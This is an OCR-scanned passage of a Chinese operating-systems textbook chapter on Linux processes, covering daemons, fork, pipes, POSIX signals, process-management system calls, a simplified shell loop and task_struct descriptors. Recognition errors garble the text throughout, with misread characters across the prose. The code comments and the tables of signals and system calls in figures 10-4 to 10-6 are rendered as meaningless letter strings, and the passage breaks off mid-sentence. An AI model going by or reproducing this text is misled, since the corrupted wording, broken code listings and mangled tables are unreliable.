此 之 间 相 互 独立 的 进程 在 同时 运行 。 而 且 ， 每 一 个 用 户 可 以 同时 开启 多 
个 进程 。 因 此 ， 在 一 个 庞大 的 系统 里 ， 可 能 有 成 百 个 甚至 上 千 个 进程 在 
同时 和 运行。 事实 上 ， 在 大 多 数 单 用 户 的 工作 站 里 ， 即 使 用 户 已 经 退出 登 
录 ， 仍 然 会 有 很 多 后 台 进 程 ， 即 守护 进程 (daemon) ， 在 运行 。 在 系统 
启动 的 时 候 ， 这 些 守护 进程 就 已 经 被 shell 脚 本 开启 (在 英语 
中 ，“daemon” 是 “demon” 的 男 一 种 拼写 ， 而 demon 是 指 一 个 恶魔 )。 

















计划 任务 (cron daemon) 是 一 个 典型 的 守护 进程 。 它 每 分 钟 运行 一 
次 来 检查 是 否 有 工作 需要 它 完成 。 如 果 有 工作 要 做 ， 它 就 会 将 之 完成 ， 


然后 进入 休眠 状态 ， 直 到 下 一 次 检查 时 刻 来 到 。 














在 Linux 系 统 中 ， 你 可 以 把 在 未 来 几 分 钟 、 几 个 小 时 、 几 天 甚至 几 
个 月 会 发 生 的 事件 列 成 时 间 表 ， 所 以 这 个 守护 进程 是 非常 必要 的 。 举 个 
例子 来 说 ， 假 定 一 个 用 户 在 下 周二 的 三 点 钟 要 去 看 牙医 ， 那 么 他 就 可 以 
在 计划 任务 的 数据 库 里 添加 一 条 记录 ， 让 计划 任务 来 提醒 他 ， 比 如 说 ， 
在 两 点 半 的 时 候 。 接 下 来 ， 当 相应 的 时 间 到 来 的 时 候 ， 计 划 任 务 意识 到 
有 工作 需要 它 来 完成 ， 就 会 运行 起 来 并 且 开 局 一 个 新 的 进程 来 执行 提醒 
程序 。 











计划 任务 也 可 以 执行 一 些 周 期 性 的 活动 ， 比 如 谨 在 每 天 凌晨 四 点 的 
时 候 进 行 磁盘 备份 ， 或 者 是 提醒 健 扎 的 用 户 每 年 10 月 31 号 的 时 候 需 要 为 
万 圣 节 储备 一 些 好 吃 的 糖果 。 当 然 ， 系 统 中 还 存在 其 他 的 守护 进程 ， 他 
们 接收 或 发 送 电子 邮件 、 管 理 打印 队列 、 检 测 内 存 中 是 否 有 足够 的 空闲 
页 等 。 在 Linux 系 统 中 ， 和 守护 进程 可 以 直接 实现 ， 因 为 它 不 过 是 与 其 他 
进程 无 关 的 男 一 个 独立 的 进程 而 已 。 








在 Linux 系 统 中 ， 进 程 通过 非常 简单 的 方式 创建 。 系 统 调用 fork 将 会 
创建 一 个 与 原始 进程 完全 相同 的 进程 副本 。 调 用 fork 函 数 的 进程 称 为 父 
进程 ， 新 的 进程 称 为 子 进 程 。 父 进程 和 子 进程 都 拥有 自己 的 私有 内 存 映 
像 。 如 果 在 调用 fork 函 数 之 后 ， 父 进程 修改 了 属于 和 它 的 一 些 变 量 ， 这 些 
变化 对 于 子 进程 来 说 是 不 可 见 的 ， 反 之 亦 然 。 











但 是 ， 父 进程 和 子 进程 可 以 共 至 已 经 打开 的 文件 。 也 就 是 说 ， 如 果 
某 一 个 文件 在 父 进程 调用 fork 函 数 之 前 就 已 经 打开 了 ， 那 么 在 父 进 程 调 
用 fork 函 数 之 后 ， 对 于 父 进 程 和 子 进程 来 说 ， 这 个 文件 也 是 打开 的 。 如 
果 父 、 子 进程 中 任何 一 个 进程 对 这 个 文件 进行 了 修改 ， 那 么 对 于 男 一 个 
进程 而 言 ， 这 些 修改 都 是 可 见 的。 由 于 这 些 修改 对 于 那些 打开 了 这 个 文 
件 的 其 他 任何 无 关 进 程 来 说 也 是 可 见 的 ， 所 以 ， 在 父 、 子 进程 间 共 享 已 
经 打开 的 文件 以 及 对 文件 的 修改 彼此 可 见 的 做 法 也 是 很 正常 的 。 





事实 上 ， 父 、 子 进程 的 内 存 映 人像、 变量 、 寄 存 器 以 及 其 他 所 有 的 东 
西 都 是 相同 的 ， 这 束 产 生 了 一 个 问题 ， 该 如 何 区 别 这 两 个 进程 ， 即 哪 一 


个 进程 该 去 执行 父 进程 的 代码 ， 哪 一 个 进程 该 去 执行 子 进程 的 代码 呢 ? 
秘密 在 于 fork 系 统 调用 给 子 进 程 返回 一 个 零 值 ， 而 给 父 进程 返回 一 个 非 
零 值 。 这 个 非 零 值 是 子 进程 的 进程 标识 符 (Process Identifier, PID) 。 
两 个 进程 检验 fork 函 数 的 返回 值 ， 并 且 根 据 返 回 值 继续 执行 ， 如 图 10-4 
所 示 。 


pid = fork( ); AMRED, MU SO ERE pid>0*/ 
if (pid < 0) { 
handle_error( ); FUER We CGM AN FF BEE Pe atk HH) */ 
} else if (pid > 0) { 
EX FARE SOE REY ARG */ 
} else { 


} 


11h A PEE (NS */ 





图 10-4 Linux 中 的 进程 创建 


进程 以 其 PID 来 命名 。 如 前 所 述 ， 当 一 个 进程 被 创建 的 时 候 ， 它 的 
父 进 程 会 得 到 它 的 PID。 如 果子 进程 希望 知道 它 自 己 的 PID， 可 以 调用 
系统 调用 getpid。PID 有 很 多 用 处 ， 举 个 例子 来 说 ， 当 一 个 子 进 程 结束 的 
时 候 ， 它 的 父 进 程 会 得 到 该 子 进程 的 PID。 这 一 点 非常 重要 ， 因 为 一 个 
父 进程 可 能 会 有 多 个 子 进 程 。 由 于 子 进 程 还 可 以 生成 子 进 程 ， 那 么 一 个 
原始 进程 可 以 生成 一 个 进程 树 ， 其 中 包含 者 子 进程 、 孙 子 进程 以 及 关系 
更 路 远 的 后 裔 进程 。 





Linux 系 统 中 的 进程 可 以 通过 一 种 消息 传递 的 方式 进行 通信 。 在 两 





个 进程 之 间 ， 可 以 建立 一 个 通道 ， 一 个 进程 向 这 个 通道 里 写 入 字 节 流 
男 一 个 进程 从 这 个 通道 中 读 取 字 节 流 。 这 些 通 道 称 为 管道 (pipe)。 使 用 

道 也 可 以 实现 同步 ， 因 为 如 果 一 个 进程 试图 从 一 个 空 的 管道 中 读 取 数 
据 ， 这 个 进程 就 会 被 挂 起 直到 管道 中 有 可 用 的 数据 为 止 。 











shell 中 的 管线 就 是 用 管道 技术 实现 的 。 当 shell 看 到 类 似 下 面 的 一 行 
输入 时 : 


sort<f|head 








它 会 创建 两 个 进程 ， 分 别 是 sort 和 head， 同 时 在 两 个 进程 间 建 立 一 
个 管道 使 得 sort 进 程 的 标准 输出 作为 head 进 程 的 标准 输入 。 这 样 一 来 ， 
Sort 进程 产生 的 输出 可 以 直接 作为 head 进 程 的 输入 而 不 必 写 入 到 一 个 文 
件 当中 去 。 如 果 管 道 满 了 ， 系 统 会 停止 运行 sort 进 程 直 到 head 进 程 从 省 
道中 删除 一 些 数据 。 


进程 还 可 以 通过 为 一 种 方式 通信 : 软件 中 断 。 一 个 进程 可 以 给 男 一 
个 进程 发 送信 号 (signal) 。 进 程 可 以 告诉 操作 系统 当 信号 到 来 时 它们 
希望 发 生 什 么 事件 。 相 关 的 选择 有 忽略 这 个 信号 、 抓 取 这 个 信号 或 者 利 
用 这 个 信号 杀 死 共 个 进程 〈 大 部 分 情况 下 ， 这 是 处 理 信 号 的 默认 方 
Th) 。 如 果 一 个 进程 希望 获取 所 有 发 送 给 它 的 信号 ， 它 束 必 须 指 定 一 个 
言 号 处 理 函 数 。 当 信号 到 达 时 ， 控 制 立 即 切 换 到 信号 处 理 函 数 。 当 信和 号 
处 理 函 数 结束 并 返回 之 后 ， 控 制 像 硬件 O 中 断 一 样 返回 到 陷入 点 处 。 


一 个 进程 只 可 以 给 它 所 在 进程 组 中 的 其 他 进程 发 送信 号 ， 这 个 进程 组 包 
括 它 的 父 进程 《以 及 远 祖 进程 ) 、 兄 第 进程 和 子 进程 《以 及 后 裔 进 
程 ) 。 同 时 ， 一 个 进程 可 以 利用 系统 调用 给 它 所 在 的 进程 组 中 所 有 的 成 


信号 还 可 以 用 于 其 他 用 途 。 比 如 说 ， 如 果 一 个 进程 正在 进行 浮 点 运 
算 ， 但 是 不 慎 除 数 为 0， 它 就 会 得 到 一 个 SIGFPE 信 号 〈( 浮 点 运算 异常 信 
F) 。POSIX 系 统 定义 的 信号 详 见 图 10-5 所 示 。 很 多 Linux 系 统 会 有 自己 
添加 的 额外 信号 ， 但 是 使 用 了 这 些 信号 的 程序 一 般 情 况 下 将 没有 办 法 移 
植 到 Linux 的 其 他 版 本 或 者 UNIX 系 统 上 。 





信 号 
SIGABRT | ”进程 中 止 且 强 迫 核 心 转 储 
“警报 时 钟 超时 
OLE wee EM, BRO) 
REE ELE e AEN 
用 户 按 了 DEL 键 中 断 了 进程 
SIGQUIT | 用 户 按键 要 求 核心 转 储 








SIGKILL | 杀 死 进程 (不 能 被 捕捉 或 忽略 ) 
SIGPIPE | 进程 写 入 了 无 读者 的 管道 
SIGSEGV | 进程 引用 了 非法 的 内 存 地 址 
SIGTERM| 用 于 要 求 进程 正常 终止 

用 于 应 用 程序 定义 的 目的 
SIGUSR2 | 用 于 应 用 程序 定义 的 目的 








图 10-5 POSIX 定 义 的 信号 


10.3.2 Linux 中 进程 管理 相关 的 系统 调用 


现在 来 关注 一 下 Linux 系 统 中 与 进程 管理 相关 的 系统 调用 。 主 要 的 
系统 调用 如 图 10-6 所 示 。 为 了 开始 我 们 的 讨论 ，fork 函 数 是 一 个 很 好 的 
切入 点 。fork 系 统 调用 是 Linux 系 统 中 创建 一 个 新 进程 的 主要 方式 ， 同 时 
也 被 其 他 传统 的 UNIX 系 统 所 文 持 〈 在 下 一 部 分 将 讨论 另 一 种 创建 进程 
的 方法 ) 。fork 函 数 创 建 一 个 与 原始 进程 完全 相同 的 进程 副本 ， 包 括 相 
同 的 文件 描述 符 、 相 同 的 寄存 器 内 容 和 其 他 的 所 有 东西 。fork 函 数 调用 
之 后 ， 原 始 进程 和 它 的 副本 《 即 父 进程 和 子 进程 ) 各 循 其 路 。 虽 然 在 
fork 函 数 刚刚 结束 调用 的 时 候 ， 父 、 子 进程 所 拥有 的 全 部 变量 部 具有 相 
同 的 变量 值 ， 但 是 由 于 父 进程 的 全 部 地 址 空间 已 经 被 子 进程 完全 复制 ， 

、 子 进程 中 的 任何 一 个 对 内 存 的 后 续 操 作 所 引起 的 变化 将 不 会 影响 男 
外 一 个 进程 。fork 函 数 的 返回 值 ， 对 于 子 进程 来 说 ， 恒 为 0， 对 于 父 进 程 
来 说 ， 是 它 所 生成 的 子 进 程 的 PID。 使 用 返回 的 PID， 可 以 区 分 哪 一 个 
进程 是 父 进程 ， 哪 一 个 进程 是 子 进程 。 


























Fe Ze Vil H — H 述 
|pid=fork () E 创建 一 个 与 父 进程 - - 样 的 子 进程 


lpid=waitpid (pid,&statloc,opts)| 等 待 子 进程 终 上 

s=execve (name,argv,envp) FEE REN WB 

exit (status) _ l 终止 进程 运行 并 返回 状态 值 
s=sigaction (sig,&act,&oldact) | 定 又 信号 处 理 的 动作 
s=sigreturn (&context) 从 信和 号 返回 
s=sigprocmask (how,&set,&old)| 检查 或 更 换 信号 掩 码 
s=sigpending (set) _ “| PRAGA SE EG SER 
s=sigsuspend (sigmask) 14 Het y KEND BK EE ike HE Fe 
ls=kill (pid,sig) 发 送信 号 到 进程 


Iresidual=alarm (seconds) 设置 报警 时 钟 E 
s=pause () = 挂 起 调用 程序 直到 下 一 个 信号 出 现 
图 10-6 一 些 与 进程 相关 的 系统 调用 。 如 果 发 生 错 误 ， 则 返回 值 s 
是 -1，pid 指 进程 ID ，residual 指 前 一 个 警报 的 剩余 时 间 。 参 数 的 含义 由 其 
名 字 指 出 










































在 大 多 数 情 况 下 ， 调 用 fork 函 数 之 后 ， 子 进程 需要 执行 不 同 于 父 进 
程 的 代码 。 以 shell 为 例 。 它 从 终端 读 取 一 行 命令 ， 调 用 fork 函 数 生成 一 
个 子 进程 ， 然 后 等 待 子 进程 来 执行 这 个 命令 ， 子 进程 结束 之 后 继续 读 取 
下 一 条 命令 。 在 等 待 子 进程 结束 的 过 程 中 ， 父 进程 调用 系统 调用 
waitpid， 一 直 等 待 直到 子 进程 结束 运行 《如 果 该 父 进程 不 止 拥有 一 个 子 
进程 ， 那 么 要 一 直 等 待 直到 所 有 的 子 进程 全 部 结束 运行 ) 。waitpid 系 统 
调用 有 三 个 参数 。 设 置 第 一 个 参数 可 以 使 调用 者 等 待 某 一 个 特定 的 子 进 
程 。 如 果 第 一 个 参数 为 -1， 任 何 一 个 子 进程 结束 系统 调用 waitpid 即 可 返 
回 ( 比 如 说 ， 第 一 个 子 进程 》。 第 二 个 参数 是 一 个 用 来 存储 子 进程 退出 











状态 〈( 正 第 退出 、 寞 第 退出 和 退出 值 〉 的 变量 地 址 。 第 三 个 参数 决定 了 
如 果 没 有 子 进 程 结束 运行 的 话 ， 调 用 者 是 阻 竖 还 是 返回 。 





仍然 以 shell 为 例 ， 子 进程 必须 执行 用 户 键入 的 命令 。 子 进程 通过 调 
用 系统 调用 exec 来 执行 用 户 命令 ， 以 exec 函 数 的 第 一 个 参数 命名 的 文件 
将 会 替换 掉 子 进程 原来 的 全 部 核心 映像 。 图 10-7 展 示 了 一 个 高 度 简化 的 
shell (有 助 于 理解 系统 调用 fork，waitpid 和 exec 的 用 法 ) 。 


在 大 多 数 情 况 下 ，exec 函 数 有 三 个 参数 ， 待 执行 文件 的 文件 名 ， 指 
问 参 数 数组 的 指针 和 指 回环 境 数组 的 指针 。 简 单 介 绍 一 下 其 他 的 类 似 函 
数 。 很 多 库 函 数 ， 如 execl、execv、execle 和 execve， 人 允许 省 略 参 数 或 者 
用 不 同 的 方式 来 指定 参数 。 上 述 的 所 有 库 函 数 都 会 调用 相同 的 底层 系统 
调用 。 尺 定 系 统 调用 是 exec 函 数 ， 但 是 函数 库 中 却 没有 同名 的 库 函 数 ， 
所 以 只 能 使 用 上 面 提 到 的 其 他 函数 。 








考虑 在 shell 中 输入 如 下 命令 : 








cp filel file2 








用 来 建立 一 个 名 为 file2 的 file1 的 副本 。 在 shell 调 用 fork 函 数 之 后 ， 
子 进 程 定位 并 执行 文件 名 为 cp 的 可 执行 文件 同时 把 需要 复制 的 文件 信息 
传递 给 它 。 





cp 的 主 程序 (还 有 很 多 其 他 的 程序 ) 包含 一 个 函数 声明 : 


main(argc,argv,envp) 





在 这 里 ， 参 数 argc 表 示 命 令 行 中 包括 程序 名 的 项 的 数目 。 在 上 面 所 
举 的 例子 中 ，argc 的 值 为 3。 


第 二 个 参数 argv 是 一 个 指 癌 数组 的 指针 。 数 组 的 第 i 项 是 一 个 指 癌 命 
令 行 中 第 i 个 字符 串 的 指针 。 在 此 例 中 ，argv[0] 指 疝 字 符 串 “cp”。 以 此 类 
推 ，argv[1] 指 问 五 字 市 长 度 的 字符 串 “filel”，argv[2] 指 向 五 学 节 长 度 的 


字符 串 “file2”。 








main 的 第 三 个 参数 envp 是 一 个 指向 环境 的 指针 ， 这 里 的 环境 ， 是 指 
一 个 包含 咎 干 个 形 如 name=value 赋 值 语句 的 字符 串 数组 ， 这 个 数组 将 传 
递 终端 类 型 、 主 目录 名 等 信息 给 程序 。 在 图 10-7 中 ， 没 有 要 传 给 子 进 程 
的 环境 列表 ， 所 以 在 这 里 ，execve 函 数 的 第 三 个 参数 是 0。 

















while (TRUE) { PAK : J * BAAR 
type_prompt ); 片 在 屏幕 上 显示 提示 符 */ 
read_command(command, params)， 访 从 键盘 读 取 输入 行 */ 
人 * 创 建 子 进程 */ 


pid = fork( ); 

if (pid < 0) { | 
printf("Unable to fork 0"); /* EIR AS*/ 
continue; /* i BAR */ 


} 


if (pid != 0) { 

waitpid (-1, &status, 0); /* 父 进程 等 待 子 进程 */ 
} else { 

execve(command, params, 0); /*- HERE AT HEE */ 
} 





图 10-7 一 个 高 度 简化 的 shell 








如 果 exec 函 数 看 起 来 太 复杂 了 ， 不 要 泄气 ， 这 已 经 是 最 复 如 的 系统 
调用 了 ， 剩 下 的 要 简单 很 多 。 作 为 一 个 简单 的 例子 ， 我 们 来 考虑 exit 函 
数 ， 当 进程 结束 运行 时 会 调用 这 个 函数 。 它 有 一 个 参数 ， 即 退出 状态 
《从 0 到 255) ， 这 个 参数 的 值 最 后 会 传递 给 父 进程 调用 waitpid 函 数 的 第 
二 个 参数 一 一 状态 参数 。 状 态 参 数 的 低 字 节 部 分 包含 着 结束 状态 ，0 意 
味 着 正常 结束 ， 其 他 的 值 代 表 各 种 不 同 的 错误 。 状 态 参 数 的 高 字 节 部 分 
包含 着 子 进程 的 退出 状态 〈 从 0 到 255) ， 其 值 由 子 进程 调用 的 exit 系 统 
调用 指定 。 例 如 ， 如 果 父 进程 执行 如 下 语句 : 











n=waitpid(-1, &status,0); 





它 将 一 直 处 于 挂 起 状态 ， 直 到 有 子 进程 结束 运行 。 如 果子 进程 退出 
时 以 4 作为 exit 函 数 的 参数 ， 父 进程 将 会 被 唤醒 ， 同 时 将 变量 n 设 置 为 子 
进程 的 PID， 变 量 status 设 置 为 0x0400( 在 C 语 言 中 ， 以 0x 作 为 前 级 表示 
十 六 进 制 ) 。 变 量 status 的 低 字 节 与 信号 有 关 ， 高 字 节 是 子 进 程 返回 时 
调用 exit 函 数 的 参数 值 。 

















如 果 一 个 进程 退出 但 是 它 的 父 进程 并 没有 在 等 每 它 ， 这 个 进程 进入 
伪 死 状态 (zombie state) 。 最 后 当 父 进程 等 待 它 时 ， 这 个 进程 才 会 结 


Ro 





一 些 与 信号 相关 的 系统 调用 以 各 种 各 样 的 方式 被 运用 。 比 方 阅 ， 如 
果 一 个 用 户 偶然 间 命 令 文字 编辑 器 显示 一 篇 超 长 文档 的 全 部 内 容 ， 然 后 
意识 到 这 是 一 个 误 操作 ， 这 残 需 要 采用 某 些 方法 来 打 断 文字 编辑 器 的 工 
作 。 对 于 用 户 来 说 ， 最 第 用 的 选择 是 融 击 条 些 特 定 的 键 〈( 如 DEL 或 者 
CTRL-C 等 ) ， 从 而 给 文字 编辑 器 及 送 一 个 信号 。 文 字 编辑 需 捕 换 到 这 


个 信号 ， 然 后 停止 显示 。 








为 了 表明 所 关心 的 信号 有 哪些 ， 进 程 可 以 调用 系统 调用 sigaction。 
这 个 函数 的 第 一 个 参数 是 希望 捕捉 的 信号 〈 如 图 10-5 所 示 ) 。 第 二 个 参 
数 是 一 个 指向 结构 的 指针 ， 在 这 个 结构 中 包括 一 个 指向 信号 处 理 函 数 的 
指针 以 及 一 些 其 他 的 位 和 标志 。 第 三 个 参数 也 是 一 个 指向 结构 的 指针 ， 
这 个 结构 接收 系统 返回 的 当前 正在 进行 的 信号 处 理 的 相关 信息 ， 有 可 能 


以 后 这 些 信息 需要 恢复 。 











音 号 处 理 函 数 可 以 运行 任意 长 的 时 间 。 尽 管 如 此 ， 在 实践 当中 ， 通 
常情 况 下 信号 处 理 函数 都 非常 短小 精 悍 。 当 信号 处 理 完毕 之 后 ， 控 制 返 
回 到 断 点 处 继续 执行 。 


sigaction 系 统 调用 也 可 以 用 来 忽略 一 个 信号 ， 或 者 恢复 为 一 个 杀 死 
进程 的 缺 省 操作 。 


他 击 DEL 键 并 不 是 发 送信 号 的 惟一 方式 。 系 统 调用 kil 允许 一 个 进 
时 给 它 相 关 的 进程 发 送信 号 。 选 择 “kill* 作 为 这 个 系统 调用 的 名 字 其 实 
并 不 是 十 分 贴切 ， 因 为 大 多 数 进程 发 送信 号 给 别 的 进程 只 是 为 了 信号 能 
够 被 捕捉 到 。 














对 于 很 多 实时 应 用 程序 ， 在 一 段 特定 的 时 间 间 隔 之 后 ， 一 个 进程 必 
须 被 打 断 ， 系 统 会 转 去 做 一 些 其 他 的 事情 ， 比 如 说 在 一 个 不 可 信 的 信道 
上 重新 发 送 一 个 可 能 丢失 的 数据 包 。 为 了 处 理 这 种 情况 ， 系 统 提供 了 
alarm 系 统 调用 。 这 个 系统 调用 的 参数 规定 了 一 个 以 秒 为 单位 的 时 间 间 
隔 ， 这 个 时 间 间 隔 过 后 ， 一 个 名 为 SIGALRM 的 信和 号 会 被 发 送 给 进程 。 
一 个 进程 在 某 一 个 特定 的 时 刻 只 能 有 惟一 一 个 未 处 理 的 警报 。 如 果 
alarm 系 统 调用 首先 以 10 秒 为 参数 被 调用 ，3 秒 钟 之 后 ， 又 以 20 秒 为 参数 
被 调用 ， 那 么 只 会 生成 一 个 SIGALRM 信 号 ， 这 个 信号 生成 在 第 二 次 调 
用 alarm 系 统 调 用 的 20 秒 之 后 。 第 一 次 alarm 系 统 调 用 设置 的 信号 被 第 二 
次 alarm 系 统 调用 取消 了 。 如 果 alarm 系 统 调用 的 参数 为 0， 任 何 即将 发 生 
的 警报 信号 都 会 被 取消 。 如 果 没 有 捕捉 到 警报 信号 ， 将 会 采取 默认 的 处 

















理 方 式 ， 收 取信 和 号 的 进程 将 会 被 杀 死 。 从 技术 角度 来 讲 ， 警 报信 号 是 可 
以 名 略 的 ， 但 是 这 样 做 坚 无 意义 。 








有 些 时 候 会 发 生 这 样 的 情况 ， 在 信和 号 到 来 之 前 ， 进 程 无 事 可 做 。 比 
如 说 ， 考 虑 一 个 用 来 测试 阅读 速度 和 理解 能 力 的 计算 机 辅助 教学 程序 。 
它 在 屏幕 上 显示 一 些 文本 然后 调用 alarm 函 数 于 30 秒 后 生成 一 个 警报 信 

o 当 学 生 读 谍 文 的 时 候 ， 程 序 就 无 事 可 做 。 它 可 以 进入 空 循环 而 不 做 
任何 事情 ， 但 是 这 样 一 来 就 会 浪费 其 他 后 台 程 序 或 用 户 忽 需 的 CPU 时 
间 。 一 个 更 好 的 解决 办 法 束 是 使 用 pause 系 统 调用 ， 它 会 通知 Linux 系 统 
将 本 进程 挂 起 直到 下 一 个 信号 到 来 。 














10.3.3 ” Linux 中 进程 与 线程 的 实现 





Linux 系 统 中 的 一 个 进程 就 像 是 一 座 冰 山 : 你 所 看 见 的 不 过 是 它 露 
出 水 面 的 部 分 ， 而 很 重要 的 一 部 分 隐藏 在 水 下 。 每 一 个 进程 都 有 一 个 运 
行 用 户 程序 的 用 户 模式 。 但 是 当 它 的 茶 一 个 线程 调用 系统 调用 之 后 ， 进 
程 会 陷入 内 核 模 式 并 且 运 行 在 内 核 上 下 文中 ， 它 将 使 用 不 同 的 内 存 映 射 
并 且 拥 有 对 所 有 机 器 资源 的 访问 权 。 它 还 是 同一 个 线程 ， 但 是 现在 拥有 
更 高 的 权限 ， 同 时 拥有 目 己 的 内 核 堆栈 以 及 内 核 程 序 计 数 器 。 这 几 点 非 
种 重要 ， 因 为 一 个 系统 调用 可 能 会 因为 茶 些 原因 陷入 阻 竖 态 ， 比 如 次 ， 
等 符 一 个 磁盘 操作 的 完成 。 这 时 程序 计数 项 和 寄存 器 内 容 会 ” 保 存 下 来 
使 得 不 久之 后 线程 可 以 在 内 核 模 式 下 继续 运行 。 











在 Linux 系 统 内 核 中 ， 进 程 通过 数据 结构 task_struct 被 表示 成 任务 
(task) 。 不 像 其 他 的 操作 系统 会 区 别 进程 、 轻 量 级 进程 和 线程 ，Linux 
系统 用 任务 的 数据 结构 来 表示 所 有 的 执行 上 下 文 。 所 以 ， 一 个 单线 程 的 
进程 只 有 一 个 任务 数据 结构 ， 而 一 个 多 线程 的 进程 将 为 每 一 个 用 户 级 线 
程 分 配 一 个 任务 数据 结构 。 最 后 ，Linux 的 内 核 是 多 线程 的 ， 并 且 它 所 
拥有 的 是 与 任何 用 户 进 程 无 关 的 内 核 级 线程 ， 这 些 内 核 级 线程 执行 内 核 
代码 。 稍 后 ， 本 节 会 重新 关注 多 线程 进程 〈 一 般 的 讲 ， 就 是 线程 ) 的 处 
PET ZK 








对 于 每 一 个 进程 ， 一 个 类 型 为 task_struct 的 进程 描述 符 是 始终 存在 
于 内 存 当 中 的 。 它 包含 了 内 核 管理 全 部 进程 所 需 的 重要 信息 ， 如 调度 参 
数 、 已 打开 的 文件 描述 符 列 表 等 。 进 程 描述 符 从 进程 被 创建 开始 就 一 直 
存在 于 内 核 堆栈 之 中 。 


为 了 与 其 他 UNIX 系 统 兼 容 ，Linux 还 通过 进程 标识 符 (PID) 来 区 
分 进程 。 内 核 将 所 有 进程 的 任务 数据 结构 组 织 成 一 个 双向 链表 。 不 需要 
遍历 这 个 链表 来 访问 进程 描述 符 ，PID 可 以 直接 被 映射 成 进程 的 任务 数 
据 结构 所 在 的 地 址 ， 从 而 立即 访问 进程 的 信息 。 











任务 数据 结构 包含 非常 多 的 分 量 。 其 中 一 些 分 量 包 含 指向 其 他 数据 
结构 或 段 的 指针 ， 比 如 说 包含 关于 已 打开 文件 的 信息 。 有 些 段 只 与 进程 
用 户 级 的 数据 结构 有 关 ， 当 用 户 进程 没有 运行 的 时 候 ， 它 们 是 不 被 关注 
的 。 所 以 ， 当 不 需要 它们 的 时 候 ， 这 些 段 可 以 被 交换 出 去 或 重新 分 页 以 
达到 不 浪费 内 存 的 目的 。 举 个 例子 ， 尽 管 对 于 一 个 进程 来 说 ， 当 它 被 交 
换 出 去 的 时 候 ， 可 能 会 有 其 他 进程 给 它 发 送信 号 ， 但 是 这 个 进程 本 身 却 
不 会 要 求 读 取 一 个 文件 。 正 因为 如 此 ， 关 于 信号 的 信息 才 必 须 永远 保存 
在 内 存 里 ， 即 使 这 个 进程 已 经 不 在 内 存 当 中 了 。 换 句 话说 ， 关 于 文件 摘 
述 答 的 信息 可 以 被 保存 在 用 户 级 的 数据 结构 里 ， 当 进程 存在 于 内 存 当 中 
并 且 可 以 执行 的 时 候 ， 这 些 信息 才 需 要 被 调 入 内 存 。 








进程 描述 符 的 信息 包含 以 下 几 大 类 : 


IJ) 调度 参数 。 进 程 优 先 级 ， 最 近 消 耗 的 CPU 时 间 ， 最 近 睡 眠 的 时 
间 。 上 面 几 项 内 容 结合 在 一 起 决定 了 下 一 个 要 运行 的 进程 是 哪 一 个 。 





2) 内 存 映 财 。 指 向 人 代码、 数据、 堆栈 段 或 页 表 的 指针 。 如 果 代 人 码 段 
是 共享 的 ， 代 码 指 针 指 问 共 享 代码 表 。 当 进程 不 在 内 存 当 中 时 ， 关 于 如 
何在 磁盘 上 找到 这 些 数 据 的 信息 也 被 保存 在 这 里 。 





3) 信 写 。 掩 码 显 示 了 哪些 信号 被 急 略 、 哪 些 信 号 需要 捕捉 、 哪 些 信 


号 被 暂时 阻塞 以 及 哪些 信和 号 在 传递 当中 。 





4) 机 器 寄存 器 。 当 内 核 陷阱 发 生 时 ， 机 器 寄存 器 的 内 容 〈 也 包括 被 
使 用 了 的 浮 点 寄存 器 的 内 容 ) 会 被 保存 。 


5) 系 统 调用 状态 。 关 于 当前 系统 调用 的 信息 ， 包 括 参 数 和 返回 值 。 





6) 文 件 描述 符 表 。 当 一 个 与 文件 描述 符 有 关 的 系统 调用 被 调用 的 时 
候 ， 文 件 描述 符 作 为 索引 在 文件 描述 符 表 中 定位 相关 文件 的 i 贡 点 数据 
结构 。 





7) 统 计 。 指 向 记录 用 户 、 进 程 占用 系统 CPU 时 间 的 表 的 指针 。 一 些 
系统 还 保存 一 个 进程 最 多 可 以 占用 CPU 的 时 间 、 进 程 可 以 拥有 的 最 大 堆 
栈 空 间 、 进 程 可 以 消耗 的 页 面 数 等 。 


8) 内 核 堆栈 。 进 程 的 内 核 部 分 可 以 使 用 的 固定 堆栈 。 


9) 其 他 。 当 前 进程 状态 。 如 果 有 的 话 ， 包 括 正 在 等 待 的 事件 、 距 离 
警报 时 钟 超 时 的 时 间 、PID、 父 进程 的 PID 以 及 其 他 用 户 标识 符 、 组 标 


太太 Fy 
识 符 等 。 





记 住 这 些 信息 ， 现 在 可 以 很 容易 地 解释 在 Linux 系 统 中 是 如 何 创 建 
进程 的 。 实 际 上 ， 创 建 一 个 新 进程 的 过 程 非常 简单 。 为 子 进程 创建 一 个 
新 的 进程 描述 符 和 用 户 空 间 ， 然 后 从 父 进程 复制 大 量 的 内 容 。 这 个 子 进 
程 被 赋予 一 个 PTID， 并 建立 它 的 内 存 映 射 ， 同 时 它 也 被 赋予 了 访问 属于 
父 进程 文件 的 权利 。 然 后 ， 它 的 寄存 器 内 容 被 初始 化 并 准备 运行 。 





当 系 统 调用 fork 执 行 的 时 候 ， 调 用 fork 函 数 的 进程 陷入 内 核 并 且 创 
府 一 个 任务 数据 结构 和 其 他 相关 的 数据 结构 ， 如 内 核 堆栈 和 thread_info 
结构 。 这 个 结构 位 于 进程 堆栈 栈 底 固定 偏 移 量 的 地 方 ， 包 含 一 些 进程 参 
数 ， 以 及 进程 描述 符 的 地 址 。 把 进程 描述 符 的 地 址 存储 在 一 个 固定 的 地 
方 ， 使 得 Linux 系 统 只 需要 进行 很 少 的 有 效 操作 惑 可 以 找到 一 个 运行 中 
进程 的 任务 数据 结构 。 








进程 描述 符 的 主要 内 容 根据 父 进 程 的 进程 描述 符 来 填充 。Linux 系 
统 只 需要 寻找 一 个 可 用 的 PID， 更 新 进程 标识 符 散 列表 的 表 项 使 之 指 问 
新 的 任务 数据 结构 即 可 。 如 果 散 列表 发 生 神 突 ， 相 同 键 值 的 进程 描述 符 
会 被 组 成 链表 。 它 会 把 task_struct 结 构 中 的 一 些 分 量 设置 为 指向 任务 数 
组 中 相应 进程 的 前 一 /后 一 进程 的 指针 。 








理论 上 ， 现 在 就 应 该 为 子 进程 分 配 数据 段 、 扒 栈 段 ， 并 且 对 父 进程 
的 段 进 行 复 制 ， 因 为 fork 函 数 意味 着 父 、 子 进程 之 间 不 共享 内 存 。 其 中 
如 果 代 码 段 是 只 读 的 ， 可 以 复制 也 可 以 共享 。 然 后 ， 子 进程 就 可 以 运行 
ee 








但 是 ， 复 制 内 存 的 代价 相当 昂贵 ， 所 以 现代 Linux 系 统 都 使 用 了 坎 
骗 的 手段 。 它 们 赋予 子 进 程 属于 它 的 页 表 ， 但 是 这 些 页 表 都 指向 父 进 程 
的 页 面 ， 同 时 把 这 些 页 面 标记 成 只 读 。 当 子 进程 试图 网 茶 一 页 面 中 写 入 
